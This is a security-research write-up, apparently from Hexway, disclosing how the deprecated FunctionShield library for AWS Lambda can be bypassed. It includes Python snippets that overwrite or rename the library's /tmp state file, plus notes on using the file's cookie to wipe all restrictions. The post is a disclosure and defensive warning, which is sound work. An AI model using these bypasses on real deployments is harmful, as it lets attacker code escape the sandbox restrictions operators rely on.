Breaking the FunctionShield cloud security library by Hexway

Description
Process

TL;DR We've found a vulnerability in FunctionShield, a cloud security library, that allows bypassing its tightest restrictions completely.

All technical details can be found in the "Process" section.

Cloud computing platforms are highly common these days. Fortunately, the times when companies used to make silly mistakes like leaving the Amazon S3 bucket open are gone. Yet, the cloud ecosphere remains counter-intuitive for many users, and they can and will make mistakes.

Take AWS Lambda, for example. On-demand execution of user code in a serverless ecosystem, what could go wrong? When user code is involved, there is plenty of ways to shoot yourself in the foot. This problem is kind of obvious, and there are some products developed to keep your cloud application safe.

One of them is FunctionShield.

Important note: FunctionShield is no longer maintained by the developers. So, it looks like there won't be any security patches - that's a very solid reason for not using it because you can't rely on it anymore.

It's a free library, and it seems to be secure, so why not use it? Check the statistics. There are no stats for pip or pip3, only for npm:

FunctionShield%20Description/Untitled.png

https://npm-stat.com/charts.html?package=%40puresec%2Ffunction-shield&from=2019-12-01&to=2019-12-31

So, it's still about 8800 downloads for npm, December 2019.

Still, FunctionShield is used in some middleware software for AWS Lambda:

https://github.com/middyjs/middy

Tech sites and blogs recommend using it, and some cloud security lists include it:

https://geekflare.com/serverless-application-security/

https://www.jeremydaly.com/serverless-security-with-functionshield/

https://anir0y.live/class/blog/securityaudit-aws/

And here's some guy saying that their company uses it in production (please don't):

https://blog.innomizetech.com/2019/11/19/07-best-practices-when-using-aws-ssm-parameter-store/

You get the point - people out there are still using FunctionShield.

So, let's see how this library works.

How FunctionShield works

FunctionShield is a compiled library and can be used in applications on NodeJS, Python, or Java. It's specialized for working in AWS (AWS Lambda) and Google Cloud Functions environments.

FunctionShield has five options; four of them are policies that restrict code execution to prevent potentially malicious activities, and one policy is a switch that disables the sending of telemetrics to the developers' server.

Now, let's look at the four restrictive policies:

Disable read and write to tmp folder
Disable spawning child processes
Disable network interaction
Disable reading of the handler's source code file (in our case, it's handler.py).

Each options has three modes:

Block - the library interrupts every attempt to use a certain type of actions;

Alert - sends alerts when triggered;

Allow - does nothing.

We tested the Python version of FunctionShield on AWS Lambda.

Vulnerability: TL;DR

The FunctionShield library stores its permission rules in a binary file in the tmp folder on the system. If an attacker is able to rewrite it, FunctionShield will think that spawning child processes is allowed. From this moment on, the attacker is able to create child processes that are not covered by the FunctionShield's rules set, so they are not affected by any restrictions.

For full technical coverage of this vulnerability, go to the second part of this article - the research process.

Solution:

Do not rely on FunctionShield!

Currently, it is useless. Since FunctionShield is now deprecated, we don't think that will change in the future. All you need in a modern cloud environment is to figure out your role system and configure it right. Yes, sometimes it's hard to do, but if you can't set up your cloud role system according to your situation - you're sitting on a time bomb, and no magic library will save you.

Author: md5(d22b44ecf71c2c2686c58e817a8f03e0)

Part I. Setup

Let's assume that we're using the following Python script (handler.py in /functionshield):


    #!/usr/bin/python3
    import subprocess
    import urllib.request
    import traceback
    import logging
    import os

    def testChildProcess():
        #Testing child process creation:
        helloworld = subprocess.check_output(["echo","Hello world!"])
        helloworld = helloworld.decode(encoding='UTF-8')
        print(helloworld)

    def testNetwork():
        #Testing network interaction:
        f = urllib.request.urlopen("https://hexway.io/")
        print(f.getcode())
        print()

    def testHandlerReading():
        #Testing handler reading:
        handler = open("./handler.py", "r")
        print(len(handler.read()))

    #Debug code to catch the errors and print them:
    try:
        testChildProcess()
    except Exception as e:
        logging.error(traceback.format_exc())

    try:
        testNetwork()
    except Exception as e:
        logging.error(traceback.format_exc())

    try:
        testHandlerReading()
    except Exception as e:
        logging.error(traceback.format_exc())

If we run it, that's what we will get:

FunctionShield%20Process/Untitled%0.png

That's the result of our child process with echo, the response code from hexway.io and the number of symbols in our handler.py script.

Neat!

Now let's get to FunctionShield.

First, we need to set it up. Install the latest version from pip3:


    pip3 install function-shield

If you try to use it just like that, you'll get an error saying that it can only work in an AWS/GCS environment.

It can be easily fixed. You need to edit the python wrapper which is located in /usr/local/lib/python3.7/dist-packages/function_shield/init.py. Add this line at the beginning of the script:


    import os
    os.environ['AWS_EXECUTION_ENV'] = "1"

To use this library, we need a FunctionShield token. You can get it from the developer's website. In this case, you have to put it in the FUNCTION_SHIELD_TOKEN environment variable. Now, we will configure it in our handler.py script; that's what we add after imports at the beginning of the file:


    import function_shield

    #We need this part to change environment and show FunctionShield where is our handler file
    os.environ["_HANDLER"] = "handler.py"
    os.environ["LAMBDA_TASK_ROOT"] = "/functionshield"
    os.environ["LAMBDA_RUNTIME_DIR"] = "/functionshield"

    #Initialize configuring function and run it afterward
    def functionshieldConfigure():
        function_shield.configure({
            "policy": {
                "outbound_connectivity": "block",
                "read_write_tmp": "allow",
                "create_child_process": "block",
                "read_handler": "block"
            },
            "token": os.environ["FUNCTION_SHIELD_TOKEN"]
        })
    functionshieldConfigure()

Now, everything except reading in and writing to the /tmp/ folder is blocked.

Okay, now you will get something like this:


    {"details":{"arguments":["echo","Hello world!"],"path":"/usr/bin/echo"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.110491Z","policy":"create_child_process","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.111471Z","policy":"read_handler","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.111670Z","policy":"read_handler","mode":"block"}
    ERROR:root:Traceback (most recent call last):
      File "./handler.py", line 45, in 
      File "./handler.py", line 29, in testChildProcess
      File "/usr/lib/python3.7/subprocess.py", line 395, in check_output
        **kwargs).stdout
      File "/usr/lib/python3.7/subprocess.py", line 487, in run
        output=stdout, stderr=stderr)
    subprocess.CalledProcessError: Command '['echo', 'Hello world!']' returned non-zero exit status 222.

    {"details":{"host":"hexway.io","ip":"78.47.164.34"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.131352Z","policy":"outbound_connectivity","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.131824Z","policy":"read_handler","mode":"block"}

    {"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.132025Z","policy":"read_handler","mode":"block"}
    ERROR:root:Traceback (most recent call last):
      File "/usr/lib/python3.7/urllib/request.py", line 1317, in do_open
        encode_chunked=req.has_header('Transfer-encoding'))
      File "/usr/lib/python3.7/http/client.py", line 1244, in request
        self._send_request(method, url, body, headers, encode_chunked)
      File "/usr/lib/python3.7/http/client.py", line 1290, in _send_request
        self.endheaders(body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.7/http/client.py", line 1239, in endheaders
        self._send_output(message_body, encode_chunked=encode_chunked)
      File "/usr/lib/python3.7/http/client.py", line 1026, in _send_output
        self.send(msg)
      File "/usr/lib/python3.7/http/client.py", line 966, in send
        self.connect()
      File "/usr/lib/python3.7/http/client.py", line 1406, in connect
        super().connect()
      File "/usr/lib/python3.7/http/client.py", line 938, in connect
        (self.host,self.port), self.timeout, self.source_address)
      File "/usr/lib/python3.7/socket.py", line 727, in create_connection
        raise err
      File "/usr/lib/python3.7/socket.py", line 716, in create_connection
        sock.connect(sa)
    OSError: [Errno 222] Unknown error 222

During the handling of the exception above, another exception occurred:

Traceback (most recent call last):
  File "./handler.py", line 50, in <module>
  File "./handler.py", line 35, in testNetwork
  File "/usr/lib/python3.7/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib/python3.7/urllib/request.py", line 525, in open
    response = self._open(req, data)
  File "/usr/lib/python3.7/urllib/request.py", line 543, in _open
    '_open', req)
  File "/usr/lib/python3.7/urllib/request.py", line 503, in _call_chain
    result = func(*args)
  File "/usr/lib/python3.7/urllib/request.py", line 1360, in https_open
    context=self._context, check_hostname=self._check_hostname)
  File "/usr/lib/python3.7/urllib/request.py", line 1319, in do_open
    raise URLError(err)
urllib.error.URLError: <urlopen error [Errno 222] Unknown error 222>

{"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.133761Z","policy":"read_handler","mode":"block"}

{"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.133904Z","policy":"read_handler","mode":"block"}

{"details":{"path":"/functionshield/handler.py"},"function_shield":true,"timestamp":"2020-01-13T15:36:05.133979Z","policy":"read_handler","mode":"block"}
ERROR:root:Traceback (most recent call last):
  File "./handler.py", line 55, in <module>
  File "./handler.py", line 41, in testHandlerReading
OSError: [Errno 222] Unknown error 222: './handler.py'

Every time we try using something restricted, we get error 222. It's a custom error that is used only by FunctionShield in response to a blocked policy.

Part II. First strike

What happens when you configure the library? It must place its policies somewhere - somewhere safe.

It stores them in the tmp directory.

Wait, what?

FunctionShield%20Process/Untitled%201.png

Oh, this doesn't look good.

Every process of library configuration creates a new file in /tmp/.

Let's look at the structure of the file, there's a chunk of bytes in the beginning:

FunctionShield%20Process/Untitled%202.png

So, if we change policies, we will see that there are 4 bytes that change. All 02 bytes are "Block" policies; the 5th "00" byte is an "Allow /tmp writing" policy. There's no chance that the library uses this file after configuration! Probably, it just writes it there to move it to a proper place later. Let's just try to replace this first chunk of bytes with zeros and add this code just before the try/pass section:


    #Policy rewrite exploit
    tempfiles = os.listdir('/tmp')
    for file in tempfiles:
        if "functionshield" in file:
            print(file)
            statefile = open("/tmp/" + file, "r+b")
            statefile.seek(0)
            statefile.write(b"\x00" * 24)
            statefile.close

Again, let's try to use some restricted actions.

Nope, it doesn't work.

If you try to use this exploit on the latest version, you won't get anything because this bug was fixed in the October patch.

Hnnng.

You know what? At this point, let's raise the stakes.

We will not only use the latest version from pip3 but also reconfigure FunctionShield to block everything:


    function_shield.configure({
            "policy": {
                "outbound_connectivity": "block",
                "read_write_tmp": "block",
                "create_child_process": "block",
                "read_handler": "block"
            },
            "token": os.environ['FUNCTION_SHIELD_TOKEN']
        })

Are we safe now?

No, we're not.

Part III. Diving deeper

The most important question now is - how does this library work on a lower level?

In this case, there's a simple python wrapper around the functionshield.so binary library. Since it's binary, looking up syscalls for blocking actions would be a good place to start. Here are two parts of the output of strace: the script is trying to spawn a new "echo 'Hello world!'" child process, like we have done before.

Without FunctionShield:

FunctionShield%20Process/Untitled%203.png

With FunctionShield:

FunctionShield%20Process/Untitled%204.png

You see? There's a brk in the middle right after a clone and two close system calls.

Our guess is that this library just has a blacklist of syscalls. After configuring FunctionShield, it waits until some higher-level code tries to use those syscalls from the blacklist (generated with the help of a policy file) on the OS level. In the case of malicious syscalls, the library breaks the execution of the thread.

The main issue with blacklists is that you can never foresee every unwanted scenario. So, a blacklist can't block undesired behavior in 100% of cases.

That was the part with child process creation. Let's see what happens if we try to rewrite some bytes in the state file using the exploit from above.

Without FunctionShield:

FunctionShield%20Process/Untitled%205.png

With FunctionShield:

FunctionShield%20Process/Untitled%206.png

As you can see, this defense mechanism won't let us write anything to the actual FunctionShield state file. FunctionShield contains the path to the actual state file in its memory and stops at every attempt to open it and write something.

Alright, we know what we need to change - the state file in /tmp directory. But we can't just overwrite it because we can't use "openat" or "write" syscalls on any files in /tmp. What else could we do? Are there any other python wrappers around linux syscalls that we can use in this situation?

After a while, we found a way: what if we just move it?

As you know, to rename a file or a folder in Linux you can use the mv command. It will use the move system call to let the OS know what file you want to rename and the new name itself. Okay, what's the wrapper for this in python? os.rename(), for example.

Let's try it with FunctionShield on with this code:


    #Trying to move actual policy file:
    tempfiles = os.listdir('/tmp')
    for file in tempfiles:
        if "functionshield" in file:
            print("Moving file: " + file)
            os.rename("/tmp/" + file, "/tmp/renamed")
            print("File moved")

And the result is:

FunctionShield%20Process/Untitled%207.png

Woah, it worked! Alright, we can rename the policy file, but there's a bunch of 222 errors after that. So, here's the plan - we will replace the state file with a dummy:


    #Dummy exploit:
    def createDummy():
        file = open("./dummy", "w+b")
        file.seek(0)
        file.write(b"\x00")
        file.close
    def shieldBasher():
        tmp = os.listdir("/tmp/")
        for x in tmp:
            if "functionshield_state" in x:
                createDummy()
                os.rename("./dummy", "/tmp/" + x)
    shieldBasher()

Alright, what about policies?

FunctionShield%20Process/Untitled%208.png

So, the child spawning test worked and all others didn't. We don't need them anyway. Why?

Since FunctionShield doesn't control the child processes, we can now do anything we want by using, for example, subprocess.check_output.

At this point, we've bypassed all the library's restrictions. We haven't tested other languages (java, nodejs), but at least in python it looks like:

if the attacker has the ability to move and rewrite files, he can bypass the FunctionShield library

What's the point of using it then?

Afterword

There are two curious details about FunctionShield's workflow that we want to mention:

The state file has not only the flags for FunctionShield's policies but also a cookie to reconfigure it. It's possible to get the environment variable containing the FunctionShield token, read the cookie, and reconfigure the library to wipe all restrictions. All you need to do is read the state file.
Besides replacing a state file with a dummy, you can also move an actual state file, replace the first chunk of data with zero bytes, and rename it back. A curious thing here: somehow this disables all blocking rules but only when there are already a few state files in the /tmp/ folder.

Author: md5(d22b44ecf71c2c2686c58e817a8f03e0)